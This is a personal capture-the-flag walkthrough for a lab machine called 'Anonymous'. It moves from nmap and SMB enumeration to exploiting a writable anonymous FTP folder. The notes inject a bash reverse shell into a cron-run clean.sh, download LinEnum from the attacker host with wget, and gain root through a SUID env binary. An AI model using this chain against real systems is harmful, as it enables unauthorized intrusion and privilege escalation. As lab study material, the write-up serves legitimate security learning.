Anonymous:
     1-Enumeration:
        ------------------------------------------------------

        namp -Pn -v -sVC --top-ports 50 --open <IP> -oN enum/nmap-top50.logs

            PORT    STATE SERVICE     VERSION
            21/tcp  open  ftp         vsftpd 2.0.8 or later
            | ftp-syst: 
            |   STAT: 
            | FTP server status:
            |      Connected to ::ffff:10.6.1.162
            |_End of status
            | ftp-anon: Anonymous FTP login allowed (FTP code 230)
            |_drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts [NSE: writeable]

            22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
            | ssh-hostkey: 
            |   2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
            |   256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
            |_  256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)

            139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) <--------
            445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP) <-------
            Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

            Host script results:
            | nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
            | Names:
            |   ANONYMOUS<00>        Flags: <unique><active>
            |   ANONYMOUS<03>        Flags: <unique><active>
            |   ANONYMOUS<20>        Flags: <unique><active>
            |   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
            |   WORKGROUP<00>        Flags: <group><active>
            |   WORKGROUP<1d>        Flags: <unique><active>
            |_  WORKGROUP<1e>        Flags: <group><active>
            | smb2-security-mode: 
            |   3:1:1: 
            |_    Message signing enabled but not required <-------------
            | smb2-time: 
            |   date: 2024-01-07T22:47:16
            |_  start_date: N/A
            | smb-os-discovery: 
            |   OS: Windows 6.1 (Samba 4.7.6-Ubuntu) <-----------
            |   Computer name: anonymous
            |   NetBIOS computer name: ANONYMOUS\x00
            |   Domain name: \x00
            |   FQDN: anonymous
            |_  System time: 2024-01-07T22:47:16+00:00
            | smb-security-mode: 
            |   account_used: guest
            |   authentication_level: user
            |   challenge_response: supported
            |_  message_signing: disabled (dangerous, but default)

            Read data files from: /usr/bin/../share/nmap
            Service detection performed. Please report any incorrect results at ht

        ------------------------------------------------------
        SMD Server Enum:
            
            smbmap -u "guest" -p "" -P445 -H 10.10.146.217


        FTP Server Enum:
            FTP - Anonymous:
                drwxrwxrwx    2 111      113          4096 Jun 04  2020 scripts

                binary

                ftp> get clean.sh
                ftp> get removed_files.log
                ftp> get to_do.txt

            Exploit:

                We will override the "clean.sh" scrypt to get a revrse shell

                We inject a reverse shell.bash in the clean.sh file
                    bash -i >& /dev/tcp/<Kali IP>/<Port> 0>&1
                    nc -lvp <Port>
                We go back to ftp
                    ls
                    cd
                    ftp> put clean.sh

                Now we have a shell:

                    In Kali - We open a python3 -m http.server <80>


                    Victim Machine:
                        We find a folder whre we have the rigths to upload Linenum.sh
                    
                        wget http://<Kali IP>/linenum.sh 

                    
                        SUID Exploit:
                            [+] Possibly interesting SUID files:
                            -rwsr-xr-x 1 root root 35000 Jan 18  2018 /usr/bin/env
                            
                            we go the file path:
                                ./env /bin/sh -p
                                
            WE ARE ROOT ----------------------------------------------